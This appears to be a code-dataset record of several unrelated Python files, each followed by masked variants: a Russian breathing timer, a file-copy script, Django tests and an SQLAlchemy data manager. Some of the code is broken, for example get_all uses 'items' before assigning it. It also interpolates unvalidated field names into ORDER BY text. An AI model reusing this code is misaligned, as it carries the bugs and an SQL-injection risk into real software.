token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n <function token>\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n <function token>\n <function token>\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n <function token>\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n <function token>\n <function token>\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<class token>\n<assignment token>\n<code token>\n" ]
false
36
4f0933c58aa1d41faf4f949d9684c04f9e01b473
from os.path import exists from_file = input('form_file') to_file = input('to_file') print(f"copying from {from_file} to {to_file}") indata = open(from_file).read()#这种方式读取文件后无需close print(f"the input file is {len(indata)} bytes long") print(f"does the output file exist? {exists(to_file)}") print("return to continue, CTRL-C to abort") input('?') open(to_file,'w').write(indata)#无需close print("done!")
[ "from os.path import exists\n\nfrom_file = input('form_file')\nto_file = input('to_file')\n\nprint(f\"copying from {from_file} to {to_file}\")\nindata = open(from_file).read()#这种方式读取文件后无需close\nprint(f\"the input file is {len(indata)} bytes long\")\n\nprint(f\"does the output file exist? {exists(to_file)}\")\nprint(\"return to continue, CTRL-C to abort\")\ninput('?')\n\nopen(to_file,'w').write(indata)#无需close\n\nprint(\"done!\")\n\n", "from os.path import exists\nfrom_file = input('form_file')\nto_file = input('to_file')\nprint(f'copying from {from_file} to {to_file}')\nindata = open(from_file).read()\nprint(f'the input file is {len(indata)} bytes long')\nprint(f'does the output file exist? {exists(to_file)}')\nprint('return to continue, CTRL-C to abort')\ninput('?')\nopen(to_file, 'w').write(indata)\nprint('done!')\n", "<import token>\nfrom_file = input('form_file')\nto_file = input('to_file')\nprint(f'copying from {from_file} to {to_file}')\nindata = open(from_file).read()\nprint(f'the input file is {len(indata)} bytes long')\nprint(f'does the output file exist? {exists(to_file)}')\nprint('return to continue, CTRL-C to abort')\ninput('?')\nopen(to_file, 'w').write(indata)\nprint('done!')\n", "<import token>\n<assignment token>\nprint(f'copying from {from_file} to {to_file}')\n<assignment token>\nprint(f'the input file is {len(indata)} bytes long')\nprint(f'does the output file exist? {exists(to_file)}')\nprint('return to continue, CTRL-C to abort')\ninput('?')\nopen(to_file, 'w').write(indata)\nprint('done!')\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
37
5c81ddbc8f5a162949a100dbef1c69551d9e267a
# -*- coding: utf-8 -*- from django.test import TestCase from django.contrib.auth.models import User from ..models import Todo class MyTestCase(TestCase): def test_mark_done(self): user = User.objects.create_user(email='user@…', username='user', password='somepasswd') todo = Todo(title='SomeTitle', description='SomeDescr', owner=user) res = todo.mark_done(user) self.assertTrue(res) self.assertEqual(Todo.objects.count(), 1) def test_mark_done_already_done(self): user = User.objects.create_user(email='user@…', username='user', password='somepasswd') todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user) res = todo.mark_done(user) self.assertIsNone(res) # todo not saved because mark_done don't save already done todos self.assertEqual(Todo.objects.count(), 0)
[ "# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom ..models import Todo\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user', password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user', password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n # todo not saved because mark_done don't save already done todos\n self.assertEqual(Todo.objects.count(), 0)\n", "from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom ..models import Todo\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n", "<import token>\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n", "<import token>\n\n\nclass MyTestCase(TestCase):\n <function token>\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n", "<import token>\n\n\nclass MyTestCase(TestCase):\n <function token>\n <function token>\n", "<import token>\n<class token>\n" ]
false
38
509129052f97bb32b4ba0e71ecd7b1061d5f8da2
print (180 / 4)
[ "print (180 / 4)", "print(180 / 4)\n", "<code token>\n" ]
false
39
2c90c4e0b42a75d6d387b9b2d0118d8e991b5a08
import math import decimal from typing import Union, List, Set from sqlalchemy import text from .model import BaseMixin from ..core.db import db Orders = List[Set(str, Union(str, int, decimal.Decimal))] class BaseDBMgr: def get_page(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), page:int=1, per_page:int=10)->dict: '''获取分页数据 @param BaseMixin cls 数据库模型实体类 @param set filters 查询条件 @param str order 排序 @param tuple field 返回字段 @param int page 页码 @param int per_page 每页数据数量 @return dict ''' res = { 'page': { 'current_page': page, 'per_page': per_page, 'total_page': 0, 'count': 0, }, 'items': [] } query = db.query(cls_).filter(*filters) if hasattr(cls_, 'deleted_at'): query = query.filter(cls_.deleted_at==0) res['page']['count'] = query.count() res['page']['total_page'] = math.ceil(res['page']['count'] / per_page) for order in orders: field, sort = order sort = 'desc' if sort not in ['asc', 'desc'] else sort query = query.order_by(text(f'{field} {sort}')) data = query.offset((page-1)*per_page).limit(per_page) if not field: res['items'] = [item.to_dict() for item in data] else: res['items'] = [item.to_dict(only=field) for item in data] return res def get_all(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), limit:int=0)->list: '''获取所有满足条件的数据 @param BaseMixin cls 数据库模型实体类 @param set filters 查询条件 @param str order 排序 @param tuple field 返回字段 @param int limit 取数据最大数量 @return list ''' query = db.query(cls_) if filters: query = query.filter(*filters) if hasattr(cls_, 'deleted_at'): query = query.filter(cls_.deleted_at==0) for order in orders: field, sort = order sort = 'desc' if sort not in ['asc', 'desc'] else sort query = query.order_by(text(f'{field} {sort}')) if limit != 0: query = query.limit(limit) query = query.all() if not field: items = [item.to_dict() for item in items] else: items = [item.to_dict(only=field) for item in items] return items def get_first(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=())->dict: '''获取所有满足条件的第一条数据 @param BaseMixin cls 数据库模型实体类 @param set filters 查询条件 @param str order 排序 @param tuple field 返回字段 @return dict ''' items = self.get_all(cls_, filters, orders, field, limit=1) return items[0] if items else None def add(self, cls_:BaseMixin, data:dict)->int: '''插入一条数据 @param BaseMixin cls 数据库模型实体类 @param dict data 数据 @return int 插入数据的主键 ''' item = cls_(**data) db.add(item) db.flush() return item.id def update(self, cls_:BaseMixin, data:dict, filters:set)->int: '''更新数据 @param BaseMixin cls 数据库模型实体类 @param dict data 数据 @param set filters 过滤条件 @return int 影响的行数 ''' query = db.query(cls_).filter(*filters) if hasattr(cls_, 'deleted_at'): query = query.filter(cls_.deleted_at==0) return query.update(data, synchronize_session=False) def delete(self, cls_:BaseMixin, filters:set)->int: '''更新数据 @param BaseMixin cls 数据库模型实体类 @param set filters 过滤条件 @return int 影响的行数 ''' query = db.query(cls_).filter(*filters) if hasattr(cls_, 'deleted_at'): items = query.filter(cls_.deleted_at==0).all() for item in items: item.delete() affect_rows = len(items) else: affect_rows = query.filter(*filters).delete(synchronize_session=False) db.commit() return affect_rows def count(self, cls_:BaseMixin, filters:set, field=None)->int: '''获取满足条件的总行数 @param BaseMixin cls 数据库模型实体类 @param set filters 过滤条件 @param string|None field 统计的字段 @return int ''' query = db.query(cls_).filter(*filters) if hasattr(cls_, 'deleted_at'): query = query.filter(cls_.deleted_at==0) if field is None: return query.count() else: return query.count(field)
[ "import math\nimport decimal\nfrom typing import Union, List, Set\n\nfrom sqlalchemy import text\n\nfrom .model import BaseMixin\nfrom ..core.db import db\n\n\nOrders = List[Set(str, Union(str, int, decimal.Decimal))]\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), page:int=1, per_page:int=10)->dict:\n '''获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n '''\n res = {\n 'page': {\n 'current_page': page,\n 'per_page': per_page,\n 'total_page': 0,\n 'count': 0,\n },\n 'items': []\n }\n query = db.query(cls_).filter(*filters)\n \n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at==0)\n\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n\n data = query.offset((page-1)*per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n \n return res\n\n\n def get_all(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), limit:int=0)->list:\n '''获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n '''\n query = db.query(cls_)\n \n if filters:\n query = query.filter(*filters)\n\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at==0)\n\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n\n if limit != 0:\n query = query.limit(limit)\n \n query = query.all()\n\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n \n return items\n\n\n def get_first(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=())->dict:\n '''获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n '''\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n\n\n def add(self, cls_:BaseMixin, data:dict)->int:\n '''插入一条数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @return int 插入数据的主键\n '''\n item = cls_(**data)\n db.add(item)\n db.flush()\n return item.id\n\n\n def update(self, cls_:BaseMixin, data:dict, filters:set)->int:\n '''更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n '''\n query = db.query(cls_).filter(*filters)\n\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at==0)\n\n return query.update(data, synchronize_session=False)\n\n\n def delete(self, cls_:BaseMixin, filters:set)->int:\n '''更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n '''\n query = db.query(cls_).filter(*filters)\n\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at==0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session=False)\n db.commit()\n return affect_rows\n\n\n def count(self, cls_:BaseMixin, filters:set, field=None)->int:\n '''获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n '''\n query = db.query(cls_).filter(*filters)\n\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at==0)\n \n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "import math\nimport decimal\nfrom typing import Union, List, Set\nfrom sqlalchemy import text\nfrom .model import BaseMixin\nfrom ..core.db import db\nOrders = List[Set(str, Union(str, int, decimal.Decimal))]\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n\n def add(self, cls_: BaseMixin, data: dict) ->int:\n \"\"\"插入一条数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @return int 插入数据的主键\n \"\"\"\n item = cls_(**data)\n db.add(item)\n db.flush()\n return item.id\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n\n def count(self, cls_: BaseMixin, filters: set, field=None) ->int:\n \"\"\"获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "<import token>\nOrders = List[Set(str, Union(str, int, decimal.Decimal))]\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n\n def add(self, cls_: BaseMixin, data: dict) ->int:\n \"\"\"插入一条数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @return int 插入数据的主键\n \"\"\"\n item = cls_(**data)\n db.add(item)\n db.flush()\n return item.id\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n\n def count(self, cls_: BaseMixin, filters: set, field=None) ->int:\n \"\"\"获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n\n def add(self, cls_: BaseMixin, data: dict) ->int:\n \"\"\"插入一条数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @return int 插入数据的主键\n \"\"\"\n item = cls_(**data)\n db.add(item)\n db.flush()\n return item.id\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n\n def count(self, cls_: BaseMixin, filters: set, field=None) ->int:\n \"\"\"获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 